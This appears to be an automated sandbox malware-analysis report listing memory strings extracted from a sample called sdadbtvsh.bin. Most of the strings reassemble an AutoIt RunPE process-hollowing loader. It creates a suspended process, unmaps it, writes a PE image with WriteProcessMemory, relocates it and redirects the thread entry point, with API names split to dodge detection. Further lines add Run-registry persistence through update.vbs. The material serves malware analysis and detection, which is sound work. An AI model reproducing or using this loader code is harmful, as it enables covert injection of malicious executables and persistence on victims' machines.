                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif='memstr_99f2f96e-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif]'`memstr_c1d0d251-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runpe($bbinaryimage, $scommandline = '', $sexemodule = @autoitexe)memstr_989e5ce3-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $tbinary = dllstructcreate("byte[" & binarylen($bbinary) & "]")memstr_9411307d-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $tstartupinfo = dllstructcreate("dword cbsize;" & "ptr reserved;" & "ptr desktop;" & "ptr title;" & "dword x;" & "dword y;" & "dword xsize;" & "dword ysize;" & "dword xcountchars;" & "dword ycountchars;" & "dword fillattribute;" & "dword flags;" & "word showwindow;" & "word reserved2;" & "ptr reserved2;" & "ptr hstdinput;" & "ptr hstdoutput;" & "ptr hstderror")memstr_de68ad62-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $tprocess_information = dllstructcreate("ptr process;" & "ptr thread;" & "dword processid;" & "dword threadid")memstr_9eba84be-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $acall = dllcall("kernel32.dll", "bool", "createprocessw", "wstr", $sexemodule, "wstr", $scommandline, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", dllstructgetptr($tstartupinfo), "ptr", dllstructgetptr($tprocess_information))memstr_bcde8035-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0)memstr_78bfe17c-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ivirtualaddress, $isizeofblock, $inumberofentries !memstr_5a1fc97a-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $tmagic = dllstructcreate("word magic;", $ppointer)memstr_afb80f61-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0) "memstr_bec0b261-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0)@"|memstr_8c20e9c1-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_unmapviewofsection($handlerpro, $paddress)memstr_2035a622-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $handlerpro = dllstructgetdata($tprocess_information, "process")memstr_2b1a6f5d-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)pmemstr_42f0e62c-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $tcontext = dllstructcreate("dword con" & "text" & "flags;" & "dword dr0; dword dr1; dword dr2; dword dr3; dword dr6; dword dr7;" & "dword controlword; dword statusword; dword tagword; dword erroroffset; dword errorselector; dword dataoffset; dword dataselector; byte registerarea[80]; dword cr0npxstate;" & "dword seggs; dword segfs; dword seges; dword segds;" & "dword edi; dword esi; dword ebx; dword edx; dword ecx; dword eax;" & "dword ebp; dword eip; dword segcs; dword eflags; dword esp; dword segss;" & "byte extendedregisters[512]")"umemstr_b928f963-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $timage_dos_header = dllstructcreate("char magic[2];" & "word bytesonlastpage;" & "word pages;" & "word relocations;" & "word sizeofheader;" & "word minimumextra;" & "word maximumextra;" & "word ss;" & "word sp;" & "word checksum;" & "word ip;" & "word cs;" & "word relocation;" & "word overlay;" & "char reserved[8];" & "word oemidentifier;" & "word oeminformation;" & "char reserved2[20];" & "dword addressofnewexeheader", $ppointer)64memstr_e448c2a7-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eptiontorip; uimemstr_877a363e-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"3////"e;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")memstr_223c5176-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $tcontext = dllstructcreate("align 16; uint64 p1home; uint64 p2home; uint64 p3home; uint64 p4home; uint64 p5home; uint64 p6home;" & "dword cont" & "ext" & "flags; dword mxcsr;" & "word segcs; word segds; word seges; word segfs; word seggs; word segss; dword eflags;" & "uint64 dr0; uint64 dr1; uint64 dr2; uint64 dr3; uint64 dr6; uint64 dr7;" & "uint64 rax; uint64 rcx; uint64 rdx; uint64 rbx; uint64 rsp; uint64 rbp; uint64 rsi; uint64 rdi; uint64 r8; uint64 r9; uint64 r10; uint64 r11; uint64 r12; uint64 r13; uint64 r14; uint64 r15;" & "uint64 rip;" & "uint64 header[4]; uint64 legacy[16]; uint64 xmm0[2]; uint64 xmm1[2]; uint64 xmm2[2]; uint64 xmm3[2]; uint64 xmm4[2]; uint64 xmm5[2]; uint64 xmm6[2]; uint64 xmm7[2]; uint64 xmm8[2]; uint64 xmm9[2]; uint64 xmm10[2]; uint64 xmm11[2]; uint64 xmm12[2]; uint64 xmm13[2]; uint64 xmm14[2]; uint64 xmm15[2];" & "uint64 vectorregister[52]; uint64 vectorcontrol;" & "uint64 debugcontrol; uint64 lastbranchtorip; uint64 lastbranchfromrip; uint64 lastexceptiontorip; uint64 lastexceptionfromrip")memstr_4af418ca-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)memstr_68895962-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $timage_nt_signature = dllstructcreate("dword signature", $ppointer)memstr_92c54b9c-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if dllstructgetdata($timage_nt_signature, "signature") <> 17744 thenmemstr_064ee42e-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $timage_file_header = dllstructcreate("word machine;" & "word numberofsections;" & "dword timedatestamp;" & "dword pointertosymboltable;" & "dword numberofsymbols;" & "word sizeofoptionalheader;" & "word characteristics", $ppointer)memstr_49c2e699-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $inumberofsections = dllstructgetdata($timage_file_header, "numberofsections")memstr_4f62f5b1-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "dword baseofdata;" & "dword imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "dword sizeofstackreserve;" & "dword sizeofstackcommit;" & "dword sizeofheapreserve;" & "dword sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer)memstr_b5e6a46b-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "uint64 imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "uint64 sizeofstackreserve;" & "uint64 sizeofstackcommit;" & "uint64 sizeofheapreserve;" & "uint64 sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer)memstr_f521dc63-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ientrypointnew = dllstructgetdata($timage_optional_header, "addressofentrypoint")memstr_9ecaadc9-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ioptionalheadersizeofheadersnew = dllstructgetdata($timage_optional_header, "sizeofheaders")memstr_44fe8b5f-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $poptionalheaderimagebasenew = dllstructgetdata($timage_optional_header, "imagebase")memstr_0a5a2796-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ioptionalheadersizeofimagenew = random(104857600, 209715200, 1)memstr_d2ff2c82-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $timage_dir3ctory_entry_basereloc = dllstructcreate("dword virtualaddress; dword size", $ppointer)memstr_95224542-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $paddressnewbasereloc = dllstructgetdata($timage_dir3ctory_entry_basereloc, "virtualaddress")memstr_b49ab16f-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $paddressnewbasereloc and $isizebasereloc then $frelocatable = truememstr_fdefa476-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: consolewrite("!!!not relocatable module. i will try but this may not work!!!" & @crlf)memstr_375d623e-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $pzeropoint = _runbinary_allocateexespace($handlerpro, $ioptionalheadersizeofimagenew)memstr_b8cb1187-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $pzeropoint = _runbinary_allocateexespaceataddress($handlerpro, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)memstr_cb0edd35-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_unmapviewofsection($handlerpro, $poptionalheaderimagebasenew)memstr_9c9e8b93-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $theaders = dllstructcreate("byte[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)memstr_c06916d5-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc'4gmemstr_b958d137-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc<4pmemstr_07a1234f-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 185|memstr_67817d58-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif45memstr_93c2a76e-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 25memstr_beafd5bf-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc~5>memstr_f1468e40-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifp54memstr_044c7d15-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $timage_section_header = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $ppointer)memstr_0a9754ba-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $isizeofrawdata = dllstructgetdata($timage_section_header, "sizeofrawdata")memstr_1021f23f-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ppointertorawdata = $pheaders_new + dllstructgetdata($timage_section_header, "pointertorawdata")memstr_ebfa204c-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ivirtualaddress = dllstructgetdata($timage_section_header, "virtualaddress")memstr_1c67e194-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ivirtualsize = dllstructgetdata($timage_section_header, "unionofvirtualsizeandphysicaladdress")memstr_ecfab749-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $ivirtualsize and $ivirtualsize < $isizeofrawdata then $isizeofrawdata = $ivirtualsizememstr_8038deaf-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, dllstructgetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $ppointertorawdata), 1))memstr_cb47521f-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $ivirtualaddress <= $paddressnewbasereloc and $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc thenmemstr_005a2846-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $trelocraw = dllstructcreate("byte[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))memstr_3f303aa5-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $frelocate then _runbinary_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)memstr_222969d9-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $acall = dllcall("kernel32.dll", "bool", "write" & "proces" & "smemo" & "ry", "handle", $handlerpro, "ptr", $pzeropoint, "ptr", $pmodule, "dword_ptr", $ioptionalheadersizeofimagenew, "dword_ptr*", 0)memstr_f5648c2b-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $tpeb = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")memstr_c25ca4d7-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $acall = dllcall("kernel32.dll", "bool", "rea"&"dproces"&"sme"&"mory", "ptr", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0)memstr_32dfe5c5-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $acall = dllcall("kernel32.dll", "bool", "writep" & "roc" & "essmem" & "ory", "handle", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0)memstr_432ab3b0-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($tcontext, "e" & "ax", $pzeropoint + $ientrypointnew)memstr_b8a02692-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $acall = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $hthread, "ptr", dllstructgetptr($tcontext))memstr_4c017cd9-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)+2{memstr_387e6752-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $acall = dllcall("kernel32.dll", "dword", "resumethread", "handle", $hthread)memstr_14e12db1-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $handlerpro)memstr_210308b0-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)memstr_86047cca-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $timage_base_relocation = dllstructcreate("dword virtualaddress; dword sizeofblock", $pdata + $irelativemove)memstr_df28795c-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ivirtualaddress = dllstructgetdata($timage_base_relocation, "vir"&"tual"&"add"&"ress")memstr_4c311be2-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $isizeofblock = dllstructgetdata($timage_base_relocation, "sizeofblock")memstr_30309b9b-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $tenries = dllstructcreate("word[" & $inumberofentries & "]", dllstructgetptr($timage_base_relocation) + 8)memstr_1f7134ee-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error then return seterror(1, 0, 0)memstr_02676aa6-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($bufferasm, 1, $asm)memstr_67465d44-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if bitshift($idata, 12) = $iflag thenmemstr_394b7fdd-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $taddress = dllstructcreate("ptr", $pmodule + $ivirtualaddress + bitand($idata, 0xfff))memstr_c3cb89bb-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($taddress, 1, dllstructgetdata($taddress, 1) + $idelta)memstr_c6ddcff5-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1554858554.0000000001857000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8___f3c3f786d6c2076657273696f6e3d223/2e302220656e636f64696e673d225554462d38222073746/6e646/6c6f6e653d22796573223f3e0d0*3c6/7373656d626c7920786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e763/22206d6/6e696665737456657273696f6e3d223/2e30223e0d0*20203c6/7373656d626c794964656e746974792076657273696f6e3d223/2e302e302e3022206e6/6d653d224d794/70706c69636/74696f6e2e6/7070222f3e0d0*20203c7472757374496e666f20786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e7632223e0d0*202020203c73656375726974793e0d0*2020202020203c72657/75657374656450726976696c6567657320786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e7633223e0d0*20202020202020203c72657/756573746564457865637574696f6e4c6576656c206c6576656c3d226/73496e766f6_6572222075694/63636573733d22666/6c7365222f3e0d0*2020202020203c2f72657/75657374656450726976696c656765733e0d0*202020203c2f73656375726974793e0d0*20203c2f7472757374496e666f3e0d0*3c2f6/7373656d626c793e0d0*memstr_0ef2abaa-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \registry\machine\software\wow6432node\microsoft\windows\currentversion\run\registry\machine\software\wow6432node\microsoft\windows\currentversion\runhmemstr_857d6f2b-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y\machine\software\microsoft\windows\currentversion\runmemstr_6744e2c5-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs"))memstr_0d84108b-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regwrite("hkcu64\software\microsoft\windows\currentversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs"))2memstr_f52c04a3-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncmemstr_c10617ab-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif47memstr_c9cbbba2-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exitqk3memstr_3e7068a9-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exit3a1memstr_49572409-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif4tmemstr_67e493fe-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc<memstr_9296181f-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifmemstr_fb3860c1-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exitfv9memstr_55cc2b71-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif!memstr_2c31b9a1-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif$hmemstr_e4f339b3-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifqpqmemstr_f4491f02-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elsecmemstr_52429308-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exit048zmemstr_18ac213e-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif4zmemstr_1020c105-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifrmemstr_174e3a32-e
